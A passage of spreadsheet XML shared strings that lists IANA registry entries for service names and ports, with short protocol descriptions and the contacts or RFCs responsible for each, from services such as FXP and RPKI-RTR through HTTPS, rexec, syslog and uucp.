    <t>[Chris_Thornhill]</t>
  </si>
  <si>
    <t>fxp</t>
  </si>
  <si>
    <t>FXP Communication</t>
  </si>
  <si>
    <t>[James_Darnall]</t>
  </si>
  <si>
    <t>k-block</t>
  </si>
  <si>
    <t>K-BLOCK</t>
  </si>
  <si>
    <t>[Simon_P_Jackson]</t>
  </si>
  <si>
    <t>288-307</t>
  </si>
  <si>
    <t>novastorbakcup</t>
  </si>
  <si>
    <t>Novastor Backup</t>
  </si>
  <si>
    <t>[Brian_Dickman]</t>
  </si>
  <si>
    <t>entrusttime</t>
  </si>
  <si>
    <t>EntrustTime</t>
  </si>
  <si>
    <t>[Peter_Whittaker]</t>
  </si>
  <si>
    <t>bhmds</t>
  </si>
  <si>
    <t>asip-webadmin</t>
  </si>
  <si>
    <t>AppleShare IP WebAdmin</t>
  </si>
  <si>
    <t>[Ann_Huang]</t>
  </si>
  <si>
    <t>vslmp</t>
  </si>
  <si>
    <t>VSLMP</t>
  </si>
  <si>
    <t>[Gerben_Wierda]</t>
  </si>
  <si>
    <t>magenta-logic</t>
  </si>
  <si>
    <t>Magenta Logic</t>
  </si>
  <si>
    <t>[Karl_Rousseau]</t>
  </si>
  <si>
    <t>opalis-robot</t>
  </si>
  <si>
    <t>Opalis Robot</t>
  </si>
  <si>
    <t>[Laurent_Domenech]</t>
  </si>
  <si>
    <t>dpsi</t>
  </si>
  <si>
    <t>DPSI</t>
  </si>
  <si>
    <t>[Tony_Scamurra]</t>
  </si>
  <si>
    <t>decauth</t>
  </si>
  <si>
    <t>decAuth</t>
  </si>
  <si>
    <t>[Michael_Agishtein]</t>
  </si>
  <si>
    <t>zannet</t>
  </si>
  <si>
    <t>Zannet</t>
  </si>
  <si>
    <t>[Zan_Oliphant]</t>
  </si>
  <si>
    <t>pkix-timestamp</t>
  </si>
  <si>
    <t>PKIX TimeStamp</t>
  </si>
  <si>
    <t>[Robert_Zuccherato]</t>
  </si>
  <si>
    <t>ptp-event</t>
  </si>
  <si>
    <t>PTP Event</t>
  </si>
  <si>
    <t>[Kang_Lee]</t>
  </si>
  <si>
    <t>ptp-general</t>
  </si>
  <si>
    <t>PTP General</t>
  </si>
  <si>
    <t>pip</t>
  </si>
  <si>
    <t>PIP</t>
  </si>
  <si>
    <t>[Gordon_Mohr]</t>
  </si>
  <si>
    <t>rtsps</t>
  </si>
  <si>
    <t>RTSPS</t>
  </si>
  <si>
    <t>[Anders_Klemets]</t>
  </si>
  <si>
    <t>rpki-rtr</t>
  </si>
  <si>
    <t>Resource PKI to Router Protocol</t>
  </si>
  <si>
    <t>[RFC6810]</t>
  </si>
  <si>
    <t>rpki-rtr-tls</t>
  </si>
  <si>
    <t>Resource PKI to Router Protocol over TLS</t>
  </si>
  <si>
    <t>325-332</t>
  </si>
  <si>
    <t>texar</t>
  </si>
  <si>
    <t>Texar Security Port</t>
  </si>
  <si>
    <t>[Eugen_Bacic]</t>
  </si>
  <si>
    <t>334-343</t>
  </si>
  <si>
    <t>pdap</t>
  </si>
  <si>
    <t>Prospero Data Access Protocol</t>
  </si>
  <si>
    <t>pawserv</t>
  </si>
  <si>
    <t>Perf Analysis Workbench</t>
  </si>
  <si>
    <t>zserv</t>
  </si>
  <si>
    <t>Zebra server</t>
  </si>
  <si>
    <t>fatserv</t>
  </si>
  <si>
    <t>Fatmen Server</t>
  </si>
  <si>
    <t>csi-sgwp</t>
  </si>
  <si>
    <t>Cabletron Management Protocol</t>
  </si>
  <si>
    <t>mftp</t>
  </si>
  <si>
    <t>[Dave_Feinleib]</t>
  </si>
  <si>
    <t>matip-type-a</t>
  </si>
  <si>
    <t>MATIP Type A</t>
  </si>
  <si>
    <t>[Alain_Robert]</t>
  </si>
  <si>
    <t>[RFC2351]</t>
  </si>
  <si>
    <t>matip-type-b</t>
  </si>
  <si>
    <t>MATIP Type B</t>
  </si>
  <si>
    <t>bhoetty</t>
  </si>
  <si>
    <t>This entry records an unassigned but widespread use
(added 5/21/97)</t>
  </si>
  <si>
    <t>dtag-ste-sb</t>
  </si>
  <si>
    <t>DTAG</t>
  </si>
  <si>
    <t>[Ruediger_Wald]</t>
  </si>
  <si>
    <t>(assigned long ago)</t>
  </si>
  <si>
    <t>bhoedap4</t>
  </si>
  <si>
    <t>ndsauth</t>
  </si>
  <si>
    <t>NDSAUTH</t>
  </si>
  <si>
    <t>[Jayakumar_Ramalingam]</t>
  </si>
  <si>
    <t>bh611</t>
  </si>
  <si>
    <t>datex-asn</t>
  </si>
  <si>
    <t>DATEX-ASN</t>
  </si>
  <si>
    <t>[Kenneth_Vaughn]</t>
  </si>
  <si>
    <t>cloanto-net-1</t>
  </si>
  <si>
    <t>Cloanto Net 1</t>
  </si>
  <si>
    <t>[Michael_Battilana]</t>
  </si>
  <si>
    <t>bhevent</t>
  </si>
  <si>
    <t>shrinkwrap</t>
  </si>
  <si>
    <t>Shrinkwrap</t>
  </si>
  <si>
    <t>[Bill_Simpson]</t>
  </si>
  <si>
    <t>nsrmp</t>
  </si>
  <si>
    <t>Network Security Risk Management Protocol</t>
  </si>
  <si>
    <t>[Eric_Jacksch]</t>
  </si>
  <si>
    <t>scoi2odialog</t>
  </si>
  <si>
    <t>[Keith_Petley]</t>
  </si>
  <si>
    <t>semantix</t>
  </si>
  <si>
    <t>Semantix</t>
  </si>
  <si>
    <t>[Semantix]</t>
  </si>
  <si>
    <t>srssend</t>
  </si>
  <si>
    <t>SRS Send</t>
  </si>
  <si>
    <t>[Curt_Mayer]</t>
  </si>
  <si>
    <t>rsvp-tunnel</t>
  </si>
  <si>
    <t>RSVP Tunnel
IANA assigned this well-formed service name as a replacement for "rsvp_tunnel".</t>
  </si>
  <si>
    <t>[Andreas_Terzis]</t>
  </si>
  <si>
    <t>rsvp_tunnel</t>
  </si>
  <si>
    <t>RSVP Tunnel</t>
  </si>
  <si>
    <t>This entry is an alias to "rsvp-tunnel".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>aurora-cmgr</t>
  </si>
  <si>
    <t>Aurora CMGR</t>
  </si>
  <si>
    <t>[Philip_Budne]</t>
  </si>
  <si>
    <t>dtk</t>
  </si>
  <si>
    <t>DTK</t>
  </si>
  <si>
    <t>[Fred_Cohen]</t>
  </si>
  <si>
    <t>odmr</t>
  </si>
  <si>
    <t>ODMR</t>
  </si>
  <si>
    <t>[Randall_Gellens]</t>
  </si>
  <si>
    <t>mortgageware</t>
  </si>
  <si>
    <t>MortgageWare</t>
  </si>
  <si>
    <t>[Ole_Hellevik]</t>
  </si>
  <si>
    <t>qbikgdp</t>
  </si>
  <si>
    <t>QbikGDP</t>
  </si>
  <si>
    <t>[Adrien_de_Croy]</t>
  </si>
  <si>
    <t>rpc2portmap</t>
  </si>
  <si>
    <t>codaauth2</t>
  </si>
  <si>
    <t>[Robert_Watson]</t>
  </si>
  <si>
    <t>clearcase</t>
  </si>
  <si>
    <t>Clearcase</t>
  </si>
  <si>
    <t>[Dave_LeBlang]</t>
  </si>
  <si>
    <t>ulistproc</t>
  </si>
  <si>
    <t>ListProcessor</t>
  </si>
  <si>
    <t>[Anastasios_Kotsikona]</t>
  </si>
  <si>
    <t>legent-1</t>
  </si>
  <si>
    <t>Legent Corporation</t>
  </si>
  <si>
    <t>legent-2</t>
  </si>
  <si>
    <t>[Keith_Boyce]</t>
  </si>
  <si>
    <t>hassle</t>
  </si>
  <si>
    <t>Hassle</t>
  </si>
  <si>
    <t>[Reinhard_Doelz]</t>
  </si>
  <si>
    <t>nip</t>
  </si>
  <si>
    <t>Amiga Envoy Network Inquiry Proto</t>
  </si>
  <si>
    <t>[Heinz_Wrobel]</t>
  </si>
  <si>
    <t>tnETOS</t>
  </si>
  <si>
    <t>NEC Corporation</t>
  </si>
  <si>
    <t>dsETOS</t>
  </si>
  <si>
    <t>[Tomoo_Fujita]</t>
  </si>
  <si>
    <t>is99c</t>
  </si>
  <si>
    <t>TIA/EIA/IS-99 modem client</t>
  </si>
  <si>
    <t>is99s</t>
  </si>
  <si>
    <t>TIA/EIA/IS-99 modem server</t>
  </si>
  <si>
    <t>[Frank_Quick]</t>
  </si>
  <si>
    <t>hp-collector</t>
  </si>
  <si>
    <t>hp performance data collector</t>
  </si>
  <si>
    <t>hp-managed-node</t>
  </si>
  <si>
    <t>hp performance data managed node</t>
  </si>
  <si>
    <t>hp-alarm-mgr</t>
  </si>
  <si>
    <t>hp performance data alarm manager</t>
  </si>
  <si>
    <t>[Frank_Blakely]</t>
  </si>
  <si>
    <t>arns</t>
  </si>
  <si>
    <t>A Remote Network Server System</t>
  </si>
  <si>
    <t>[David_Hornsby]</t>
  </si>
  <si>
    <t>ibm-app</t>
  </si>
  <si>
    <t>IBM Application</t>
  </si>
  <si>
    <t>[Lisa_Tomita]</t>
  </si>
  <si>
    <t>asa</t>
  </si>
  <si>
    <t>ASA Message Router Object Def.</t>
  </si>
  <si>
    <t>[Steve_Laitinen]</t>
  </si>
  <si>
    <t>aurp</t>
  </si>
  <si>
    <t>Appletalk Update-Based Routing Pro.</t>
  </si>
  <si>
    <t>[Chris_Ranch]</t>
  </si>
  <si>
    <t>unidata-ldm</t>
  </si>
  <si>
    <t>Unidata LDM</t>
  </si>
  <si>
    <t>[University_Corporation_for_Atmospheric_Research2]</t>
  </si>
  <si>
    <t>[Steven_Emmerson2]</t>
  </si>
  <si>
    <t>ldap</t>
  </si>
  <si>
    <t>Lightweight Directory Access Protocol</t>
  </si>
  <si>
    <t>uis</t>
  </si>
  <si>
    <t>UIS</t>
  </si>
  <si>
    <t>[Ed_Barron]</t>
  </si>
  <si>
    <t>synotics-relay</t>
  </si>
  <si>
    <t>SynOptics SNMP Relay Port</t>
  </si>
  <si>
    <t>synotics-broker</t>
  </si>
  <si>
    <t>SynOptics Port Broker Port</t>
  </si>
  <si>
    <t>[Illan_Raab]</t>
  </si>
  <si>
    <t>meta5</t>
  </si>
  <si>
    <t>Meta5</t>
  </si>
  <si>
    <t>[Jim_Kanzler]</t>
  </si>
  <si>
    <t>embl-ndt</t>
  </si>
  <si>
    <t>EMBL Nucleic Data Transfer</t>
  </si>
  <si>
    <t>[Peter_Gad]</t>
  </si>
  <si>
    <t>netcp</t>
  </si>
  <si>
    <t>NetScout Control Protocol</t>
  </si>
  <si>
    <t>[Ashwani_Singhal]</t>
  </si>
  <si>
    <t>netware-ip</t>
  </si>
  <si>
    <t>Novell Netware over IP</t>
  </si>
  <si>
    <t>mptn</t>
  </si>
  <si>
    <t>Multi Protocol Trans. Net.</t>
  </si>
  <si>
    <t>[Soumitra_Sarkar]</t>
  </si>
  <si>
    <t>kryptolan</t>
  </si>
  <si>
    <t>Kryptolan</t>
  </si>
  <si>
    <t>[Peter_de_Laval]</t>
  </si>
  <si>
    <t>iso-tsap-c2</t>
  </si>
  <si>
    <t>ISO Transport Class 2 Non-Control over TCP</t>
  </si>
  <si>
    <t>[Yanick_Pouffary]</t>
  </si>
  <si>
    <t>ISO Transport Class 2 Non-Control over UDP</t>
  </si>
  <si>
    <t>osb-sd</t>
  </si>
  <si>
    <t>Oracle Secure Backup</t>
  </si>
  <si>
    <t>[Joseph_Dziedzic]</t>
  </si>
  <si>
    <t>Formerly was Workstation Solutions</t>
  </si>
  <si>
    <t>ups</t>
  </si>
  <si>
    <t>Uninterruptible Power Supply</t>
  </si>
  <si>
    <t>[Charles_Bennett]</t>
  </si>
  <si>
    <t>genie</t>
  </si>
  <si>
    <t>Genie Protocol</t>
  </si>
  <si>
    <t>[Mark_Hankin]</t>
  </si>
  <si>
    <t>decap</t>
  </si>
  <si>
    <t>nced</t>
  </si>
  <si>
    <t>ncld</t>
  </si>
  <si>
    <t>[Richard_Jones]</t>
  </si>
  <si>
    <t>imsp</t>
  </si>
  <si>
    <t>Interactive Mail Support Protocol</t>
  </si>
  <si>
    <t>[John_Myers]</t>
  </si>
  <si>
    <t>timbuktu</t>
  </si>
  <si>
    <t>Timbuktu</t>
  </si>
  <si>
    <t>[Marc_Epard]</t>
  </si>
  <si>
    <t>prm-sm</t>
  </si>
  <si>
    <t>Prospero Resource Manager Sys. Man.</t>
  </si>
  <si>
    <t>prm-nm</t>
  </si>
  <si>
    <t>Prospero Resource Manager Node Man.</t>
  </si>
  <si>
    <t>decladebug</t>
  </si>
  <si>
    <t>DECLadebug Remote Debug Protocol</t>
  </si>
  <si>
    <t>[Hewlett_Packard]</t>
  </si>
  <si>
    <t>rmt</t>
  </si>
  <si>
    <t>Remote MT Protocol</t>
  </si>
  <si>
    <t>[Peter_Eriksson]</t>
  </si>
  <si>
    <t>synoptics-trap</t>
  </si>
  <si>
    <t>Trap Convention Port</t>
  </si>
  <si>
    <t>smsp</t>
  </si>
  <si>
    <t>Storage Management Services Protocol</t>
  </si>
  <si>
    <t>[Murthy_Srinivas]</t>
  </si>
  <si>
    <t>infoseek</t>
  </si>
  <si>
    <t>InfoSeek</t>
  </si>
  <si>
    <t>[Steve_Kirsch]</t>
  </si>
  <si>
    <t>bnet</t>
  </si>
  <si>
    <t>BNet</t>
  </si>
  <si>
    <t>[Jim_Mertz]</t>
  </si>
  <si>
    <t>silverplatter</t>
  </si>
  <si>
    <t>Silverplatter</t>
  </si>
  <si>
    <t>[Peter_Ciuffetti]</t>
  </si>
  <si>
    <t>onmux</t>
  </si>
  <si>
    <t>Onmux</t>
  </si>
  <si>
    <t>[Stephen_Hanna]</t>
  </si>
  <si>
    <t>hyper-g</t>
  </si>
  <si>
    <t>Hyper-G</t>
  </si>
  <si>
    <t>[Frank_Kappe]</t>
  </si>
  <si>
    <t>ariel1</t>
  </si>
  <si>
    <t>Ariel 1</t>
  </si>
  <si>
    <t>[Joel_Karafin]</t>
  </si>
  <si>
    <t>smpte</t>
  </si>
  <si>
    <t>SMPTE</t>
  </si>
  <si>
    <t>[Si_Becker]</t>
  </si>
  <si>
    <t>ariel2</t>
  </si>
  <si>
    <t>Ariel 2</t>
  </si>
  <si>
    <t>ariel3</t>
  </si>
  <si>
    <t>Ariel 3</t>
  </si>
  <si>
    <t>opc-job-start</t>
  </si>
  <si>
    <t>IBM Operations Planning and Control Start</t>
  </si>
  <si>
    <t>opc-job-track</t>
  </si>
  <si>
    <t>IBM Operations Planning and Control Track</t>
  </si>
  <si>
    <t>[Conny_Larsson]</t>
  </si>
  <si>
    <t>icad-el</t>
  </si>
  <si>
    <t>ICAD</t>
  </si>
  <si>
    <t>[Larry_Stone]</t>
  </si>
  <si>
    <t>smartsdp</t>
  </si>
  <si>
    <t>[Marie_Pierre_Belange]</t>
  </si>
  <si>
    <t>svrloc</t>
  </si>
  <si>
    <t>Server Location</t>
  </si>
  <si>
    <t>[Veizades]</t>
  </si>
  <si>
    <t>ocs-cmu</t>
  </si>
  <si>
    <t>OCS_CMU
IANA assigned this well-formed service name as a replacement for "ocs_cmu".</t>
  </si>
  <si>
    <t>ocs_cmu</t>
  </si>
  <si>
    <t>OCS_CMU</t>
  </si>
  <si>
    <t>This entry is an alias to "ocs-cmu".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>ocs-amu</t>
  </si>
  <si>
    <t>OCS_AMU
IANA assigned this well-formed service name as a replacement for "ocs_amu".</t>
  </si>
  <si>
    <t>[Florence_Wyman]</t>
  </si>
  <si>
    <t>ocs_amu</t>
  </si>
  <si>
    <t>OCS_AMU</t>
  </si>
  <si>
    <t>This entry is an alias to "ocs-amu".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>utmpsd</t>
  </si>
  <si>
    <t>UTMPSD</t>
  </si>
  <si>
    <t>utmpcd</t>
  </si>
  <si>
    <t>UTMPCD</t>
  </si>
  <si>
    <t>iasd</t>
  </si>
  <si>
    <t>IASD</t>
  </si>
  <si>
    <t>[Nir_Baroz]</t>
  </si>
  <si>
    <t>nnsp</t>
  </si>
  <si>
    <t>NNTP for transit servers (NNSP)</t>
  </si>
  <si>
    <t>mobileip-agent</t>
  </si>
  <si>
    <t>MobileIP-Agent</t>
  </si>
  <si>
    <t>mobilip-mn</t>
  </si>
  <si>
    <t>MobilIP-MN</t>
  </si>
  <si>
    <t>[Kannan_Alagappan_2]</t>
  </si>
  <si>
    <t>dna-cml</t>
  </si>
  <si>
    <t>DNA-CML</t>
  </si>
  <si>
    <t>[Dan_Flowers]</t>
  </si>
  <si>
    <t>comscm</t>
  </si>
  <si>
    <t>[Jim_Teague]</t>
  </si>
  <si>
    <t>dsfgw</t>
  </si>
  <si>
    <t>[Andy_McKeen]</t>
  </si>
  <si>
    <t>dasp</t>
  </si>
  <si>
    <t>[Thomas_Obermair]</t>
  </si>
  <si>
    <t>sgcp</t>
  </si>
  <si>
    <t>decvms-sysmgt</t>
  </si>
  <si>
    <t>[Lee_Barton]</t>
  </si>
  <si>
    <t>cvc-hostd</t>
  </si>
  <si>
    <t>cvc_hostd
IANA assigned this well-formed service name as a replacement for "cvc_hostd".</t>
  </si>
  <si>
    <t>[Bill_Davidson]</t>
  </si>
  <si>
    <t>cvc_hostd</t>
  </si>
  <si>
    <t>This entry is an alias to "cvc-hostd".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>https</t>
  </si>
  <si>
    <t>http protocol over TLS/SSL</t>
  </si>
  <si>
    <t>HTTPS</t>
  </si>
  <si>
    <t>snpp</t>
  </si>
  <si>
    <t>Simple Network Paging Protocol</t>
  </si>
  <si>
    <t>[RFC1568]</t>
  </si>
  <si>
    <t>microsoft-ds</t>
  </si>
  <si>
    <t>Microsoft-DS</t>
  </si>
  <si>
    <t>[Pradeep_Bahl]</t>
  </si>
  <si>
    <t>ddm-rdb</t>
  </si>
  <si>
    <t>DDM-Remote Relational Database Access</t>
  </si>
  <si>
    <t>ddm-dfm</t>
  </si>
  <si>
    <t>DDM-Distributed File Management</t>
  </si>
  <si>
    <t>[Steven_Ritland]</t>
  </si>
  <si>
    <t>ddm-ssl</t>
  </si>
  <si>
    <t>DDM-Remote DB Access Using Secure Sockets</t>
  </si>
  <si>
    <t>as-servermap</t>
  </si>
  <si>
    <t>AS Server Mapper</t>
  </si>
  <si>
    <t>[Barbara_Foss]</t>
  </si>
  <si>
    <t>tserver</t>
  </si>
  <si>
    <t>Computer Supported Telecomunication Applications</t>
  </si>
  <si>
    <t>[Harvey_S_Schultz]</t>
  </si>
  <si>
    <t>sfs-smp-net</t>
  </si>
  <si>
    <t>Cray Network Semaphore server</t>
  </si>
  <si>
    <t>sfs-config</t>
  </si>
  <si>
    <t>Cray SFS config server</t>
  </si>
  <si>
    <t>[Walter_Poxon]</t>
  </si>
  <si>
    <t>creativeserver</t>
  </si>
  <si>
    <t>CreativeServer</t>
  </si>
  <si>
    <t>contentserver</t>
  </si>
  <si>
    <t>ContentServer</t>
  </si>
  <si>
    <t>creativepartnr</t>
  </si>
  <si>
    <t>CreativePartnr</t>
  </si>
  <si>
    <t>[Jesus_Ortiz]</t>
  </si>
  <si>
    <t>macon-tcp</t>
  </si>
  <si>
    <t>[Yoshinobu_Inoue]</t>
  </si>
  <si>
    <t>macon-udp</t>
  </si>
  <si>
    <t>scohelp</t>
  </si>
  <si>
    <t>[Faith_Zack]</t>
  </si>
  <si>
    <t>appleqtc</t>
  </si>
  <si>
    <t>apple quick time</t>
  </si>
  <si>
    <t>[Murali_Ranganathan]</t>
  </si>
  <si>
    <t>ampr-rcmd</t>
  </si>
  <si>
    <t>[Rob_Janssen]</t>
  </si>
  <si>
    <t>skronk</t>
  </si>
  <si>
    <t>[Henry_Strickland]</t>
  </si>
  <si>
    <t>datasurfsrv</t>
  </si>
  <si>
    <t>DataRampSrv</t>
  </si>
  <si>
    <t>datasurfsrvsec</t>
  </si>
  <si>
    <t>DataRampSrvSec</t>
  </si>
  <si>
    <t>[Diane_Downie]</t>
  </si>
  <si>
    <t>alpes</t>
  </si>
  <si>
    <t>[Alain_Durand]</t>
  </si>
  <si>
    <t>kpasswd</t>
  </si>
  <si>
    <t>[Theodore_Ts_o]</t>
  </si>
  <si>
    <t>urd</t>
  </si>
  <si>
    <t>URL Rendezvous Directory for SSM</t>
  </si>
  <si>
    <t>[Toerless_Eckert]</t>
  </si>
  <si>
    <t>submissions</t>
  </si>
  <si>
    <t>Message Submission over TLS protocol</t>
  </si>
  <si>
    <t>[RFC8314]</t>
  </si>
  <si>
    <t>igmpv3lite</t>
  </si>
  <si>
    <t>IGMP over UDP for SSM</t>
  </si>
  <si>
    <t>digital-vrc</t>
  </si>
  <si>
    <t>[Peter_Higginson]</t>
  </si>
  <si>
    <t>mylex-mapd</t>
  </si>
  <si>
    <t>[Gary_Lewis]</t>
  </si>
  <si>
    <t>photuris</t>
  </si>
  <si>
    <t>proturis</t>
  </si>
  <si>
    <t>[Bill_Simpson_2]</t>
  </si>
  <si>
    <t>rcp</t>
  </si>
  <si>
    <t>Radio Control Protocol</t>
  </si>
  <si>
    <t>[Jim_Jennings]</t>
  </si>
  <si>
    <t>scx-proxy</t>
  </si>
  <si>
    <t>[Scott_Narveson]</t>
  </si>
  <si>
    <t>mondex</t>
  </si>
  <si>
    <t>Mondex</t>
  </si>
  <si>
    <t>[Bill_Reding]</t>
  </si>
  <si>
    <t>ljk-login</t>
  </si>
  <si>
    <t>[LJK]</t>
  </si>
  <si>
    <t>hybrid-pop</t>
  </si>
  <si>
    <t>[Rami_Rubin]</t>
  </si>
  <si>
    <t>tn-tl-w1</t>
  </si>
  <si>
    <t>tn-tl-w2</t>
  </si>
  <si>
    <t>[Ed_Kress]</t>
  </si>
  <si>
    <t>tcpnethaspsrv</t>
  </si>
  <si>
    <t>[Michael_Zunke]</t>
  </si>
  <si>
    <t>tn-tl-fd1</t>
  </si>
  <si>
    <t>ss7ns</t>
  </si>
  <si>
    <t>[Jean_Michel_URSCH]</t>
  </si>
  <si>
    <t>spsc</t>
  </si>
  <si>
    <t>[Mike_Rieker]</t>
  </si>
  <si>
    <t>iafserver</t>
  </si>
  <si>
    <t>iafdbase</t>
  </si>
  <si>
    <t>[Rick_Yazwinski]</t>
  </si>
  <si>
    <t>ph</t>
  </si>
  <si>
    <t>Ph service</t>
  </si>
  <si>
    <t>[Roland_Hedberg]</t>
  </si>
  <si>
    <t>bgs-nsi</t>
  </si>
  <si>
    <t>[Jon_Saperia]</t>
  </si>
  <si>
    <t>ulpnet</t>
  </si>
  <si>
    <t>[Kevin_Mooney]</t>
  </si>
  <si>
    <t>integra-sme</t>
  </si>
  <si>
    <t>Integra Software Management Environment</t>
  </si>
  <si>
    <t>[Randall_Dow]</t>
  </si>
  <si>
    <t>powerburst</t>
  </si>
  <si>
    <t>Air Soft Power Burst</t>
  </si>
  <si>
    <t>[gary]</t>
  </si>
  <si>
    <t>avian</t>
  </si>
  <si>
    <t>[Robert_Ullmann_2]</t>
  </si>
  <si>
    <t>saft</t>
  </si>
  <si>
    <t>saft Simple Asynchronous File Transfer</t>
  </si>
  <si>
    <t>[Ulli_Horlacher]</t>
  </si>
  <si>
    <t>gss-http</t>
  </si>
  <si>
    <t>[Doug_Rosenthal]</t>
  </si>
  <si>
    <t>nest-protocol</t>
  </si>
  <si>
    <t>[Gilles_Gameiro]</t>
  </si>
  <si>
    <t>micom-pfs</t>
  </si>
  <si>
    <t>[David_Misunas]</t>
  </si>
  <si>
    <t>go-login</t>
  </si>
  <si>
    <t>[Troy_Morrison]</t>
  </si>
  <si>
    <t>ticf-1</t>
  </si>
  <si>
    <t>Transport Independent Convergence for FNA</t>
  </si>
  <si>
    <t>ticf-2</t>
  </si>
  <si>
    <t>[Mamoru_Ito]</t>
  </si>
  <si>
    <t>pov-ray</t>
  </si>
  <si>
    <t>POV-Ray</t>
  </si>
  <si>
    <t>[POV_Team_Co_ordinato]</t>
  </si>
  <si>
    <t>intecourier</t>
  </si>
  <si>
    <t>[Steve_Favor]</t>
  </si>
  <si>
    <t>pim-rp-disc</t>
  </si>
  <si>
    <t>PIM-RP-DISC</t>
  </si>
  <si>
    <t>[Dino_Farinacci]</t>
  </si>
  <si>
    <t>retrospect</t>
  </si>
  <si>
    <t>Retrospect backup and restore service</t>
  </si>
  <si>
    <t>[Retrospect_Inc]</t>
  </si>
  <si>
    <t>[JG_Heithcock]</t>
  </si>
  <si>
    <t>siam</t>
  </si>
  <si>
    <t>[Philippe_Gilbert]</t>
  </si>
  <si>
    <t>iso-ill</t>
  </si>
  <si>
    <t>ISO ILL Protocol</t>
  </si>
  <si>
    <t>isakmp</t>
  </si>
  <si>
    <t>[Mark_Schertler]</t>
  </si>
  <si>
    <t>stmf</t>
  </si>
  <si>
    <t>STMF</t>
  </si>
  <si>
    <t>[Alan_Ungar]</t>
  </si>
  <si>
    <t>mbap</t>
  </si>
  <si>
    <t>Modbus Application Protocol</t>
  </si>
  <si>
    <t>[modbus.org]</t>
  </si>
  <si>
    <t>[Dennis_Dube]</t>
  </si>
  <si>
    <t>intrinsa</t>
  </si>
  <si>
    <t>Intrinsa</t>
  </si>
  <si>
    <t>[Robert_Ford]</t>
  </si>
  <si>
    <t>citadel</t>
  </si>
  <si>
    <t>[Art_Cancro]</t>
  </si>
  <si>
    <t>mailbox-lm</t>
  </si>
  <si>
    <t>[Beverly_Moody]</t>
  </si>
  <si>
    <t>ohimsrv</t>
  </si>
  <si>
    <t>[Scott_Powell]</t>
  </si>
  <si>
    <t>crs</t>
  </si>
  <si>
    <t>[Brad_Wright]</t>
  </si>
  <si>
    <t>xvttp</t>
  </si>
  <si>
    <t>[Keith_J_Alphonso]</t>
  </si>
  <si>
    <t>snare</t>
  </si>
  <si>
    <t>[Dennis_Batchelder]</t>
  </si>
  <si>
    <t>fcp</t>
  </si>
  <si>
    <t>FirstClass Protocol</t>
  </si>
  <si>
    <t>[Mike_Marshburn]</t>
  </si>
  <si>
    <t>passgo</t>
  </si>
  <si>
    <t>PassGo</t>
  </si>
  <si>
    <t>[John_Rainford]</t>
  </si>
  <si>
    <t>exec</t>
  </si>
  <si>
    <t>remote process execution; authentication performed using passwords and UNIX login names</t>
  </si>
  <si>
    <t>comsat</t>
  </si>
  <si>
    <t>biff</t>
  </si>
  <si>
    <t>used by mail system to notify users of new mail received; currently receives messages only from processes on the same machine</t>
  </si>
  <si>
    <t>login</t>
  </si>
  <si>
    <t>remote login a la telnet; automatic authentication performed based on priviledged port numbers and distributed data bases which identify "authentication domains"</t>
  </si>
  <si>
    <t>who</t>
  </si>
  <si>
    <t>maintains data bases showing who's logged in to machines on a local net and the load average of the machine</t>
  </si>
  <si>
    <t>shell</t>
  </si>
  <si>
    <t>cmd like exec, but automatic authentication is performed as for login server</t>
  </si>
  <si>
    <t>syslog</t>
  </si>
  <si>
    <t>[RFC5426]</t>
  </si>
  <si>
    <t>printer</t>
  </si>
  <si>
    <t>spooler</t>
  </si>
  <si>
    <t>videotex</t>
  </si>
  <si>
    <t>[Daniel_Mavrakis]</t>
  </si>
  <si>
    <t>talk</t>
  </si>
  <si>
    <t>like tenex link, but across machine - unfortunately, doesn't use link protocol (this is actually just a rendezvous port from which a tcp connection is established)</t>
  </si>
  <si>
    <t>ntalk</t>
  </si>
  <si>
    <t>utime</t>
  </si>
  <si>
    <t>unixtime</t>
  </si>
  <si>
    <t>efs</t>
  </si>
  <si>
    <t>extended file name server</t>
  </si>
  <si>
    <t>router</t>
  </si>
  <si>
    <t>local routing process (on site); uses variant of Xerox NS routing information protocol - RIP</t>
  </si>
  <si>
    <t>ripng</t>
  </si>
  <si>
    <t>[Robert_E_Minnear]</t>
  </si>
  <si>
    <t>ulp</t>
  </si>
  <si>
    <t>ULP</t>
  </si>
  <si>
    <t>[Max_Morris]</t>
  </si>
  <si>
    <t>ibm-db2</t>
  </si>
  <si>
    <t>IBM-DB2</t>
  </si>
  <si>
    <t>[Juliana_Hsu]</t>
  </si>
  <si>
    <t>ncp</t>
  </si>
  <si>
    <t>NCP</t>
  </si>
  <si>
    <t>[Don_Provan_2]</t>
  </si>
  <si>
    <t>timed</t>
  </si>
  <si>
    <t>timeserver</t>
  </si>
  <si>
    <t>tempo</t>
  </si>
  <si>
    <t>newdate</t>
  </si>
  <si>
    <t>stx</t>
  </si>
  <si>
    <t>Stock IXChange</t>
  </si>
  <si>
    <t>[Fraxion_Software]</t>
  </si>
  <si>
    <t>[Ferdi_Ladeira]</t>
  </si>
  <si>
    <t>custix</t>
  </si>
  <si>
    <t>Customer IXChange</t>
  </si>
  <si>
    <t>irc-serv</t>
  </si>
  <si>
    <t>IRC-SERV</t>
  </si>
  <si>
    <t>[Brian_Tackett]</t>
  </si>
  <si>
    <t>courier</t>
  </si>
  <si>
    <t>rpc</t>
  </si>
  <si>
    <t>conference</t>
  </si>
  <si>
    <t>chat</t>
  </si>
  <si>
    <t>netnews</t>
  </si>
  <si>
    <t>readnews</t>
  </si>
  <si>
    <t>netwall</t>
  </si>
  <si>
    <t>for emergency broadcasts</t>
  </si>
  <si>
    <t>[Andreas_Heidemann]</t>
  </si>
  <si>
    <t>windream</t>
  </si>
  <si>
    <t>windream Admin</t>
  </si>
  <si>
    <t>[Uwe_Honermann]</t>
  </si>
  <si>
    <t>iiop</t>
  </si>
  <si>
    <t>[Jeff_M_Michaud]</t>
  </si>
  <si>
    <t>opalis-rdv</t>
  </si>
  <si>
    <t>nmsp</t>
  </si>
  <si>
    <t>Networked Media Streaming Protocol</t>
  </si>
  <si>
    <t>[Paul_Santinelli_Jr]</t>
  </si>
  <si>
    <t>gdomap</t>
  </si>
  <si>
    <t>[Richard_Frith_Macdon]</t>
  </si>
  <si>
    <t>apertus-ldp</t>
  </si>
  <si>
    <t>Apertus Technologies Load Determination</t>
  </si>
  <si>
    <t>uucp</t>
  </si>
  <si>
    <t>uucpd</t>
  </si>
  <si>
